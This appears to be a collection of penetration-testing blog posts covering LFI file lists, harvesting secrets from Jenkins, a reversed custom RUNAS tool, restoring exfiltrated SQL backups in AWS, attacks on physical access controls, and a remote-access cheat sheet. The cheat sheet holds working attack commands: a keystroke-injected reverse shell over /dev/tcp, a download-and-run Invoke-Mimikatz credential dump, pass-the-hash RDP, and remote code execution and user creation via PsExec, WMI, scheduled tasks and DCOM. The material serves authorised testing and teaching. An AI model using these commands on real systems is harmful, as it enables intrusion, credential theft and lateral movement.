Knowing What To Expect - os-file-list

It’s something every web application penetration tester comes across. You uncover a possible weakness, maybe a local file inclusion, directory traversal, or other vulnerability that could allow for interaction with the file system. What you need to verify the finding is a known file in a known location and, most of the time, testers tend to choose the old stand-by “/etc/passwd”.

But what happens when the web application firewall designer is wise to your penetration tester tricks and blocks any request containing “/etc/passwd”? What happens when verifying this vulnerability is not the end of the finding but the start of a larger attack? Flexibility and a depth of options become more important, and a larger list of potential local files can be very helpful.

os-file-list is a simple project designed to help penetration testers easily move past “/etc/passwd”, providing a base to cover various configurations and identify gaps in protections. os-file-list is a directory listing of world-readable files from the different Linux distributions available on leading cloud service providers. In addition to the world-readable files, we also provide readable-file listings for a basic user with no special permissions, as well as for the default user created by the cloud service provider (e.g. admin/ec2-user/root). We found the basic user useful for when administrators create a limited user account (a best practice) for handling various tasks, and the default user useful for when an administrator has failed to create a separate user.

The output is a simple one-file-per-line format, easily fed to directory enumeration tools such as Burp Intruder or any custom-written script. Additionally, the script used to generate the listings is included in the project should anyone need to generate a custom listing.
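The core of such a listing is a single find invocation; a sketch (scoped to /etc here so it finishes quickly; the project's script walks the whole filesystem and repeats the run as each user of interest):

```shell
# List world-readable regular files (the others-read permission bit, -perm -004),
# silencing permission errors. Widen /etc to / for a full listing.
find /etc -xdev -type f -perm -004 2>/dev/null | sort > os-file-list.txt
wc -l < os-file-list.txt
```

Feeding the resulting file to Burp Intruder as a payload list is then a copy-paste exercise.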

Project URL:

Pillaging The Jenkins Treasure Chest

Jenkins is a popular target for penetration testers, mainly because certain server configurations expose the Groovy Script Editor which, given the proper payload, can lead to remote code execution on the server. More and more often, though, this technique no longer works.

Even if you don’t have access to the Groovy Script Editor, though, you still stand a decent chance of getting something valuable out of the server. Jenkins tends to be a treasure trove of information in certain organizations, and it’s all too easy for a developer or operations team to leave something behind “just to get things done”.

A little background – Jenkins is an automation server that lets developers automate building software, running tests on that software, and so on. The “builds” that Jenkins runs can contain things like the console output of the build process (basically the stdout of a collection of commands and scripts), associated files in the form of “workspaces”, inherited environment variables, and much more.

Let’s talk about a couple of these:

Console Output

During a pentest, we found a Jenkins server with hundreds of “builds”, each containing a handy button on the left side called “Console Output”.


Intrigued, we clicked on it and saw what ended up being the literal stdout of the build process. Many of the builds’ console output we checked ended up being mostly useless, but some? Not so useless. A couple examples of what we’ve seen:

  • Curl/wget commands with plaintext creds to different services

  • Contents of certain automation scripts

  • Failed test cases containing SOAP requests & developer credentials

  • SSH private keys as part of a deployment script

  • Mysql client, JDBC connection strings, and sqlplus credentials

Interestingly, several instances of exposed data occurred because some part of the build process failed, and data was leaked in error messages or stack traces. Had the build succeeded, nobody might ever have known. This goes to show that failure conditions can be just as important as success conditions, if not more so.

We found that the “Console Output” was present in every build we came across and proved a very reliable source of sensitive information.
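Triaging hundreds of builds by hand doesn't scale. Jenkins serves each build's log as plaintext at /job/&lt;name&gt;/&lt;build&gt;/consoleText, so a quick keyword pass is easy to script; a minimal sketch (the host and job name are hypothetical, and the pattern is only a starting point):

```shell
# First-pass keyword pattern for build logs
PATTERN='passw(or)?d|secret|api[_-]?key|private key|jdbc:'

# On an engagement, point this at the real server:
#   curl -s "http://jenkins.example:8080/job/deploy-app/42/consoleText" | grep -inE "$PATTERN"

# Demo of the pattern against a sample log fragment:
printf 'export DB_PASSWORD=hunter2\njdbc:mysql://db:3306/app\nBuild step OK\n' \
  | grep -icE "$PATTERN"    # prints 2 (two of the three lines match)
```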


Workspaces

Certain project builds are more complicated and require accompanying files to build correctly. These could be source code, private keys, certificate bundles, credentials, configs, or anything else. You can think of workspaces the same way you think of directory indexing on web servers.


Workspaces did not appear in as many builds as the console output did, but tended to contain even more sensitive information. A couple of things we found from workspaces:

  • “Protected” source code

  • Many web.config files containing DB connection details

  • .ssh folders with private keys & known hosts files

  • Client certificates & credentials for connecting to APIs

  • Included, but unused scripts containing hardcoded credentials

  • AWS deployment ID & secret keys

We found that workspaces tended to hold a lot of data they didn’t need. After all, it’s easier to include a whole directory structure than to specify exactly which directories are important.
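Rather than clicking through a workspace file by file, Jenkins will hand you the whole thing as one archive via its standard /ws/*zip*/ download endpoint; a sketch (host and job name are hypothetical):

```shell
JOB='deploy-app'                    # hypothetical job name
BASE='http://jenkins.example:8080'  # hypothetical Jenkins host
URL="${BASE}/job/${JOB}/ws/*zip*/${JOB}.zip"
printf '%s\n' "$URL"

# On an engagement, fetch the archive with:
#   curl -s -o "${JOB}.zip" "$URL"
```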

Environment Variables

It’s well known within the developer community that including credentials in source code is a pretty big no-no. While that advice is often ignored, some developers follow the guidance of “include credentials and API keys as environment variables”, which is better. Well, Jenkins can expose those too.

You can configure certain builds to inherit particular environment variables that the build can refer to during its creation process. Things we’ve seen from exposed environment variables:

  • Internal network information for where the build is being deployed

  • Credentials

  • Proxy settings

  • Paths, usernames, emails, and admin URLs

Tool Release

These techniques have been used to compromise multi-billion-dollar corporations and are incredibly useful in today’s application development landscape. If you come across a Jenkins server during a pentest, we highly recommend taking a look at the accessible internals. Unfortunately, grabbing all these pieces manually from the web interface can be tedious and a hassle. We are releasing Jenkins-Pillage to automatically gather this information more quickly and easily.

Pentest Deep-Dive: Custom RUNAS

Information Security often exists in a delicate balance with business demands. Organizations weighing security against functionality, cost, ease-of-use, or time for development, commonly choose imperfect but realistic compromises.

For the most part, these compromises allow for progress towards business objectives while maintaining an acceptable balance. Other times—especially in the absence of a proper security evaluation—organizations can inadvertently deploy solutions that drastically increase their risk.

During a recent internal network penetration test we came across a prime example of an unbalanced solution. To solve the old problem of "How do we allow our users to install approved applications on their systems?" this organization developed a custom solution in-house. Installation scripts for the approved applications were placed within a directory on the C:\ drive and, via an easy-to-use GUI, users could select which program to install, triggering the associated script.

As a security consideration within this environment, users were not administrators on their assigned systems. However, most of the approved applications required administrator privileges to install.

As a security inconsideration, all the user workstations had been configured with a shared local administrator password so a single version of the script could be deployed on every system.

At some point, we imagine, the idea was floated to use the RUNAS command in a batch file to execute the installation as the local administrator. However, RUNAS expressly does not accept a password on the command line, as allowing it would inevitably lead to weak deployments. As described by Microsoft’s Raymond Chen:

This was a conscious decision. If it were possible to pass the password on the command line, people would start embedding passwords into batch files and logon scripts, which is laughably insecure.

Raymond kindly offers an option for those looking to head down this bad-decision rabbit hole: creating a custom executable using the CreateProcessWithLogonW function, which does allow plaintext passwords from the command line. And so a custom executable that solved this corporate need was born. For the context of this writeup we will call it RUNAS_A.exe.

At first glance we can see the developer attempted to avoid using plaintext passwords as command line arguments by instead requiring an encrypted value. An example of this:

     RUNAS_A /user administrator /pass <EncryptedPassword> "C:\installApp\install.bat"

But wait, couldn’t any user run any command as the local administrator by merely using the same command line string with a different command? e.g.:

     RUNAS_A /user administrator /pass <EncryptedPassword> "C:\evilApp.exe"

You guessed it. A static value, whether “encrypted” or not, does not prevent abuse given the design of this application. With this knowledge, an attacker could perform horizontal and vertical (per-system) privilege escalation across all machines sharing the local administrator credential.

Let’s dive a little deeper…

When first looking at the RUNAS_A command string, we noticed the password value was base64 encoded. For example:

     RUNAS_A /user admin /pass lkB6RJYwDDFtbxckaGeaUuQwWnXpcAsuHEmaMNAhrQ== "C:\installApp\install.bat"

Our hopes that someone had made the classic mistake of confusing encoding with encryption were soon dashed: the decoded string was still ciphertext, and the base64 had likely been applied simply to avoid unprintable or control characters.

Decoded Encrypted Password


The password was easily decoded but still encrypted. With access to the RUNAS_A executable, we took a look to see what it was doing regarding encryption. Before starting up any serious reversing effort, we tried running the application with no options provided.

Running RUNAS_A.exe


One of the options of RUNAS_A is an "encryption mode" to let you encrypt passwords before use. Let's try a quick known-plaintext attack to see if we can figure out what is going on.

Encrypting a Password with RUNAS_A.exe


Decoding our base64 output gives us the encrypted password.

Decoded Encrypted “testpassword” Password


Time to take a look at the output and identify the encryption algorithm? Hardly. After looking at it for merely a second, we realized the “encryption” involves placing a random character between every other character of the password.



Taking another look at our original encrypted password from the batch file, we can see it will “decrypt” to “@D01o$gROup.IO!” which, for the purposes of this writeup, is the shared local administrator password.

Decrypted Original Password


Another bittersweet moment in information security where, as the riddle is solved, the horrible truth is revealed. Not only is encrypting the password useless for restricting use of the credentials, but the encryption itself is useless at preventing anyone from learning the plaintext of the password. We have seen CTF puzzles designed for children that provided a greater cryptanalysis challenge than this application.

Diving a bit deeper into the RUNAS_A executable (using ILSpy, as RUNAS_A.exe is .NET), we can see that the “encryption” function, “EncodePID”, pairs random characters with the characters of the password and then base64 encodes the string.

Encryption Function


The “decryption” function is similarly simple, pulling out every other byte from the “encrypted” password.

Decryption Function

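The entire scheme fits in a few lines of shell. This is a sketch, not the original .NET code: we assume the random byte comes before each password byte, which matches the every-other-byte extraction described above (if the real binary interleaves in the opposite order, shift the sed offset by one):

```shell
# "Encrypt": pair each password character with a random printable character,
# then base64 the interleaved string (mirroring EncodePID's approach).
encode() {
  pw=$1; out=''
  while [ -n "$pw" ]; do
    c=${pw%"${pw#?}"}                                   # first character of $pw
    pw=${pw#?}                                          # drop it
    r=$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c1)    # random filler byte
    out="${out}${r}${c}"
  done
  printf '%s' "$out" | base64
}

# "Decrypt": base64-decode, then keep every other byte.
decode() { base64 -d | sed 's/.\(.\)/\1/g'; }

enc=$(encode 'testpassword')
printf '%s' "$enc" | decode    # prints testpassword
```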

Ultimately what we have here is a poorly balanced solution and a study in avoidance. There was a need to deploy software, on demand, to end users. To avoid making every user a local administrator, a single administrator account is reused on every system. To avoid the security restrictions of a commercially available tool, an insecure in-house application was developed. To avoid the appearance of plaintext credentials within the installation scripts, pointlessly “encrypted” credentials were used. Finally, the golden rule of “Don’t Roll Your Own Crypto” was avoided in spectacular fashion.

Frustratingly to the InfoSec mind, this security train wreck of a solution has been functioning without issue since it was developed and deployed in 2006. The original perpetrators have long since left the organization and, as the application itself has not been a squeaky wheel, it has gotten no security grease.

Hidden issues like these are the sort of findings a penetration test can uncover. Vulnerability scanning will never identify issues like these within a custom application, there will never be a vendor patch or update, and it's too vital an application to decommission for no reason. A quality penetration test can not only discover problems like this but also demonstrate the exact impact, make the argument for why things need to change, and offer advice on bringing your program back into balance.

Restore a SQL Server Database to AWS

It happens to all testers eventually. You come across a file share hosting dozens of database backups. Giddiness ensues as you realize you have full read access and can copy any of them down to your dropbox, until you notice the database backups are tens, if not hundreds, of gigabytes in size. In a situation like this you simply have neither the hard drive space nor the bandwidth to pull down a massive database backup and boot up a virtual machine to search through the data in a timely fashion.

Cue Amazon Web Services (AWS). We can upload the database backup to a secure, non-public S3 bucket and have Amazon Relational Database Service (RDS) restore the database directly. This means we can have access to that data in as little as 10 minutes while all the “heavy lifting” is performed by the cloud.

***NOTE: This script can help you demonstrate the impact of test findings without overtaxing your time or hardware but remember to always discuss the potential use of cloud technology during the engagement with your clients before testing begins.

Unfortunately, AWS likes to complicate things and there are quite a few steps involved in performing those two actions. At the bottom is a link to a bash script that will handle the entire exchange. The input is simply the database backup file to be uploaded, as well as the name of the database. After successful uploading and restoration you are provided with a table count and connection details for further queries.
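Under the hood, the heavy lifting is done by RDS itself: once the SQLSERVER_BACKUP_RESTORE option group is attached, RDS exposes a pair of stored procedures (names per AWS's native backup/restore documentation) that the script drives through sqlcmd. Using the bucket and database from the sample run below:

```sql
-- Kick off the restore of the uploaded .bak from S3
exec msdb.dbo.rds_restore_database
    @restore_db_name = 'THISISMYDATABASENAME',
    @s3_arn_to_restore_from = 'arn:aws:s3:::s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak';

-- Poll this until the task's lifecycle column reads SUCCESS
exec msdb.dbo.rds_task_status @db_name = 'THISISMYDATABASENAME';
```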

Running without any arguments:

$ ./
usage: ./ options
This script restores a SQL Server database backup to AWS and returns
connection details & a table count

   -h      Show this message
   -f      The SQL Server Database backup file (usually .bak)
   -d      Database Name (ex. MYDATBASE)

Running on a test database:

$ ./ -f /mnt/FileSrv_IP/DB_Backups/JulyDatabaseBackup.bak -d THISISMYDATABASENAME
[*] Creating S3 Bucket to store database backup: s3-sql-restore-wi41zjcsdg
[*] Uploading backup file (/mnt/FileSrv_IP/DB_Backups/JulyDatabaseBackup.bak) to S3 bucket (s3-sql-restore-wi41zjcsdg)
upload: ../JulyDatabaseBackup.bak to s3://s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak
[*] Creating a VPC security group allowing TCP1433 inbound for RDS
[*] Creating the IAM Role & Policy so RDS can access S3
[*] Creating an option group (option-group-sql-restore) to hold the SQLSERVER_BACKUP_RESTORE option for RDS
[*] Adding the SQLSERVER_BACKUP_RESTORE option to option-group-sql-restore group
Username: user34wkeceq
Password: pass9zoacs5
[*] Creating the RDS SQL Server Database - db-sql-restore-rwkmm7hog ~15mins
[*] RDS SQL Server now starting
RDS Still coming up...may take a few minutes
RDS Still coming up...may take a few minutes
RDS Still coming up...may take a few minutes
[*] SQL Server hostname:
Username: user34wkeceq
Password: pass9zoacs5
[*] Restoring the SQL server database from S3
[*] still restoring the DB
[*] still restoring the DB
          1 RESTORE_DB                                         THISISMYDATABASENAME                                                    [2019-01-18 1 2019-01-18 16:42:22.087 2019-01-18 16:41:15.730 arn:aws:s3:::s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak                                                                                                                                                                                                                                                                                                      0 NULL
[*] Row count for all tables in the database
Changed database context to 'THISISMYDATABASENAME'.
------------------------ -----------
sysclones                          0
<SNIP>                          1220
sysschobjs                      2428

(94 rows affected)
[*] Run whatever SQL queries you want with:
sqlcmd -S -U user34wkeceq -P pass9zoacs5

Now, while the script relies on Microsoft’s “sqlcmd” to run the stored procedures automatically, nothing stops you from connecting with something like SQL Server Management Studio for autocomplete and other features.

The tool can be found here:

Inside the wire at GSX 2018

This Tuesday at the ASIS Global Security Exchange (GSX) in Las Vegas, Mike Kelly and I presented our talk “Network Attacks Against Physical Access Controls” covering our experiences attacking organizations’ physical security controls post network compromise. This is a topic we had spoken about before at other conferences (HushCon, THOTCON) but the GSX was our first opportunity to move this conversation outside the strictly Information Security community, and speak directly with the type of people and organizations that would be on the receiving end of these types of attacks.

Mike and I work as penetration testers and Red Team members, assessing the security of computer networks, systems, facilities and personnel for numerous organizations. Most commonly, our clients are responsible for I.T. or Information Security at their organizations and requests for physical security testing would primarily focus on a basic scenario of: “Can an attacker leverage physical access to our facility to gain access to our internal network?” Findings for these physical security engagements would detail the methods an attacker, without network access, would use to physically compromise a location to gain a network foothold. This attack methodology provides value to the Information Security team, where protecting IT resources is the overall goal and where physical compromise is a means by which an attacker may attempt to bypass other defenses.

What we found missing from this methodology was a broader understanding and assessment of the physical security perimeter as a target in itself. When we consider physical security controls as more than just a barrier protecting the network, and instead think about their role in protecting the physical security and safety of the entire organization, we find that many of the more common attack tactics and techniques fall short of assessing the complete physical security attack surface.

Understanding where your perimeter begins is a vital part of building a comprehensive security program. It’s easy to say that the physical security perimeter starts at the edge of the property, the main gate, or the limit of a security camera’s field of view, but these answers fail to consider the level of connectivity found in the majority of organizations today. Physical Access Control System (PACS) hardware and software have evolved from using dedicated equipment, cabling, and protocols to being near plug-and-play with the rest of the network. At the same time, the explosion of internet-based attacks against organizations’ networks and personnel has effectively expanded that physical security perimeter to include the entire world.

In our presentation we talked about how physical security testing is progressing, moving past some of the more traditional techniques such as lockpicking and tailgating (or piggybacking) and more recent methods like long-range RFID badge cloning. We provided a number of examples of techniques we had put into practice during engagements targeting physical access control systems after achieving a level of unauthorized network access.

The first method we covered involves attacking the PACS hardware/firmware directly. During a Red Team test, Open Source Intelligence (OSINT) gathering revealed the exact model of door controller installed at the target facility. After acquiring one of the devices, Mike discovered a weakness in the system’s communication protocol (CVE-2017-16241) and developed a working exploit. As a result, we were able to remotely unlock the doors of the targeted facility, including those protected by biometrics. Similar research into these types of systems is ongoing, with the most recent example being the talk “I'm the One Who Doesn't Knock” by Google’s David Tomaschik at DEF CON 26.

Next, we spoke about attacks against the PACS backend systems and supporting infrastructure. These fall in line with what we would see in a network penetration test. Instances of improperly stored database backups containing badge numbers, PACS software with default credentials (including unchangeable passwords), unencrypted communications, and a lack of network segmentation resulted in the capture of sensitive badge credentials and the ability to assume direct control of employee badging and surveillance camera systems.

Finally, we covered exploiting common user errors to gain physical access. These often follow a pattern of weak password selection combined with a failure to understand the sensitivity of information like employee badge numbers. While most people would pause before emailing a spreadsheet full of unencrypted passwords, a list of employee badge numbers may not elicit the same caution. Compromising one employee email account can leave an attacker with all of the information needed to create functional clones of employee badges for the entire organization.

One of our main motivations for presenting at GSX was the opportunity to speak with the people at the intersection of information and physical security. The separation of responsibilities between an organization’s information security team and the operations/physical security team can complicate communicating the level of risk revealed by this type of testing and opportunities to bridge that gap are key. The Q&A session and discussions we enjoyed with our audience and the other attendees at GSX provided us with valuable insight into the challenges facing all of us as we continue to work towards a more secure world.

For more information on this topic, please feel free to contact us at

Remote Access Cheat Sheet

Since the advent of networked computers, administrators have had a legitimate need to remotely control systems. Several technologies have emerged to facilitate this, including built-in solutions as well as third-party options. As the list grows, pentesters/attackers have a growing list of options at their disposal; however, we haven't found a good resource that catalogs them for quick reference.

In coordination with @atucom and @thejosko's talk "Not Your Daddy's Winexe" presented at Thotcon 0x9, we have assembled this cheat sheet for remotely accessing systems. Many/most of the following methods will require pre-existing knowledge of credentials, or access to a machine that will be leveraged for lateral movement. 

If you see any of the following ports open, the corresponding technologies might be configured to allow remote access:


Remote Desktop Protocol (RDP)

RDP is Microsoft's built-in remote desktop solution that ships with all versions of Windows. The service is not listening by default, but it is commonplace to enable it in corporate environments. 

Port: 3389/TCP

Tools: Microsoft Remote Desktop Client (Windows/Mac), rdesktop, xfreerdp


  • C:\Windows\System32\mstsc.exe
  • rdesktop -g 80%
  • xfreerdp /u:josh /d:testlab /pth:64f12cddaa88057e06a81b54e73b949b /v:

Virtual Network Computing (VNC)

VNC was created as a vendor agnostic graphical desktop solution and is widely deployed in *nix environments. Historically it was commonly deployed without authentication. Modern servers strongly urge administrators to configure a password. 

Port: 5900/TCP

Tools: The plethora of open-source VNC applications, RealVNC, TightVNC, Screen Sharing (Mac)


  • vncviewer

Apple Remote Desktop (ARD)

ARD is Apple's graphical remote desktop solution. The service is not listening by default, and in our experience it is not widely deployed. 

Port: 3283/UDP (v1), 5900/TCP (v2)

Tools: Screen Sharing, VNC applications


  • /System/Library/CoreServices/Screen
  • vncviewer


X Window System (X11)

The X.Org Foundation creates and maintains the widely deployed X11 windowing system used in most *nix environments. Most administrators are aware that the client-server model allows forwarding of X sessions over SSH tunnels; however, when configured to allow TCP sessions, the X session can be attached to remotely. The default X11 configuration was changed to disallow TCP sessions several years ago, but we still see it from time to time. If you see TCP 6000+N open, you can likely execute code on that machine or remotely log keystrokes.

Port: 6000+N/TCP, (or 22/TCP via SSH)

Tools: xspy, xwatchwin, xwd, xvkbd, ssh, MSF,

Example screenshot:

xwd -root -screen -silent -display > screenshot.xwd

Example keyboard injection:

xvkbd -no-repeat -no-sync -no-jump-pointer -remote-display -text "/bin/bash -i > /dev/tcp/<&1 2>&1\r"

Example remote keylog:


System Center Configuration Manager (SCCM) Remote Control

SCCM is often used in enterprise networks to handle patch deployment for workstations and servers, as well as to facilitate installation of applications to groups of managed systems. Through the administration console, managed systems can be configured to start a remote control service (System Center Remote Control). While it provides similar functionality to RDP, it does not leverage Terminal Services, and in certain configurations it can allow full control of a remote system without alerting logged-on users to the session hijack.

Port: 2701/TCP

Tools: CmRcViewer.exe, SCCM Admin console

Note: If you are not inclined to download a random executable from the Internet (duh), the SCCM Remote Control client can be found at C:\Program Files (x86)\Microsoft Configuration Manager\AdminConsole\bin\i386\ after installing SCCM. Be warned, setting up an SCCM lab is unfathomably complicated.


Telnet

Modern operating systems no longer enable telnet by default, but we still see it on almost every pentest, on embedded devices or legacy systems. The old skool command-line console access operates as a cleartext protocol and has largely been replaced by SSH.

Port: 23/TCP

Tools: Telnet, Netcat (nc), Ncat


  • telnet
  • nc 23
  • ncat 23


Rlogin / Rsh

The Berkeley alternative to the Telnet standard was used on *nix systems for decades before being replaced by SSH. Rather than requiring user/password authentication, administrators could specify source machines that were considered authenticated via a .rhosts file. Rlogin provides an interactive shell, similar to telnet; rsh can be used to execute a single command.

Port: 512-514/TCP

Tools: rlogin, rsh, remsh, rexec, rcp


  • rlogin -l josh
  • rsh -l josh "ping -c4"

Secure Shell (SSH)

It's everywhere in the *nix world, and it has a ton of features built in that we attackers can leverage for pivoting, tunneling X sessions, file transfers, etc.

Port: 22/TCP

Tools: ssh, PuTTY


  • ssh root@

Server Message Block (SMB)

SMB has been leveraged for file sharing and administration on Windows and *nix systems for decades. Another feature often abused by attackers is the use of administrative shares (C$, ADMIN$, IPC$) to push a service binary to a target machine, then start the service for semi-interactive I/O. SysinternalsSuite includes the PsExec binary, which is largely credited with developing and popularizing this technique. Local administrative privileges are required to push the service binary to the ADMIN$ share, after which an RPC/SVCCTL call creates and starts the remote service. IPC$ is leveraged to create named pipes for input and output, which act as a semi-interactive shell.

Port: 445/TCP (SMB), 135/TCP (RPC), High-random port

Tools: PsExec.exe, (impacket), winexe, MSF, smbexec


  • PsExec.exe \\ -u josh -p Password1 cmd.exe
  • winexe --system --uninstall -U testlab/josh%Password1 // cmd.exe
  • 'josh':'Password1'@ cmd.exe
  • 'josh':'Password1'@ cmd.exe

Windows Remote Management (WinRM)

WinRM is Microsoft's implementation of the open WS-Management standard for SOAP-based remote management. Microsoft includes several standalone tools (winrm, winrs), and it is also the underlying technology used for PowerShell Remoting. Under the surface, WinRM makes use of WMI queries, but it can also leverage the IPMI driver for hardware management. It's a terribly powerful tool, albeit not widely deployed yet due to its relative infancy.

Port: 5985/TCP (HTTP), 5986/TCP (HTTPS)

Tools: winrm, winrs, PowerShell Remoting

Example list services:

winrm get wmicimv2/Win32_Service -r:

Example execute ipconfig (or any other code):

winrs /r:WIN-DEHIB5FROC2 /u:josh /p:Password1 ipconfig

Example PSRemote cmdlet on remote system:

PS> Invoke-Command {Get-Service *}

Example PSRemote interactive PS Session:

PS> Enter-PSSession -ComputerName -Credential testlab\josh
PS> ...
PS> Exit-PSSession

Windows Management Instrumentation (WMI)

WMI is Microsoft's consolidation of system management under a single umbrella. It is leveraged heavily under the hood for local operation, but can also be used for remote execution. Several built-in tools exist for either WQL query execution, or full code execution. Impacket includes wmiexec which also provides a semi-interactive shell. 

Remote WMI queries use RPC/DCOM as the communication bus.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: wmic, pth-wmic, PowerShell (Get-WMIObject), wmiexec (impacket)

Example list services:

wmic.exe /USER:"testlab\josh" /PASSWORD:"Password1" /NODE: service get "startname,pathname"

Example execute code (add user):

wmic /USER:"testlab\josh" /PASSWORD:"Password1" /NODE: process call create "net user hacker Str0nGP_$sw0rd /add /domain"

Example list services (via PS cmdlet):

PS> Get-WMIObject -ComputerName -query "Select * from Win32_Service"

Example list processes (via linux wmic util):

pth-wmic -U testlab/josh%Password1 // "select csname,name,processid,sessionid from win32_process"

Example semi-interactive shell (impacket): 'josh':'Password1'@

Scheduled Tasks 

Tasks, that are, scheduled. In addition to running commands locally, the built-in schtasks utility leverages RPC/DCOM to schedule tasks on remote machines. On legacy Windows machines, At.exe performed this functionality, but it was deprecated in favor of SchTasks on modern platforms. Application firewalls that block SchTasks may still allow At, a good reason to attempt both if necessary.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: schtasks, at


  • schtasks.exe /Create /S /U testlab\josh /P Password1 /TR "C:\Windows\System32\win32calc.exe" /TN "pwnd" /SC ONCE /ST 20:05
  • at.exe \\ 20:25 cmd /c "C:\Windows\System32\win32calc.exe"

Microsoft Management Console (MMC2.0) Application Class

In 2017, Matt Nelson released research into methods for lateral movement using DCOM. We strongly urge you to review his research for full details (it's worth the read). Reviewing all the intricacies of DCOM is outside the scope of what can/should be covered in a "cheat sheet", but suffice it to say the MMC2.0 application class can be accessed remotely over RPC/DCOM and exports the ExecuteShellCommand method, which can be used to... Execute..a..Shell..Command.

MMC requires local admin due to the nature of the application, and will be blocked by the default firewall rules. BUT, we've seen enough networks that disable host firewalls to make good use of this technique. 

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows

Example code execution:

PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",""))
PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,"7")

Example Invoke-Mimikatz (listener started on

PS> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds > C:\\Users\\josh\\Desktop\\mimi.txt"))

PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",""))

ShellWindows Object

A few weeks after his initial research on MMC lateral movement, Matt Nelson published more research targeting DCOM objects that lacked an explicit LaunchPermission attribute. Read his post here for a thorough review of the techniques shown below.

Successful auth over RPC is required; however, regardless of privilege, the code will execute as a child of the explorer.exe process with limited privileges. No scraping memory directly with this method... :(

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows

When invoking .NET calls in this fashion, the existing auth token is used. Great for lateral movement from a compromised system, but not if you are remotely accessing a target machine with recovered credentials. The simplest method we have found is to create a new PS Session with runas.

Example auth:

PS> runas /netonly /user:TESTLAB\josh "powershell.exe"

Example code execution:

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

Example: call shutdown routine (user prompted for confirmation):

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShutDownWindows()

Example troll: launch IE with Sloths in Space (10 hours):

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShellExecute("iexplore.exe","","C:\Program Files\Internet Explorer",$null,"1")

ShellBrowserWindow Object

Functionally the same as the previous method, the ShellBrowserWindow object can be leveraged for remote code execution over DCOM.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows

When invoking .NET calls in this fashion, the existing auth token is used. Great for lateral movement from a compromised system, but not if you are remotely accessing a target machine with recovered credentials. The simplest method we have found is to create a new PS Session with runas.

Example auth:

PS> runas /netonly /user:TESTLAB\josh "powershell.exe"

Example code execution:

PS> $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $obj.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)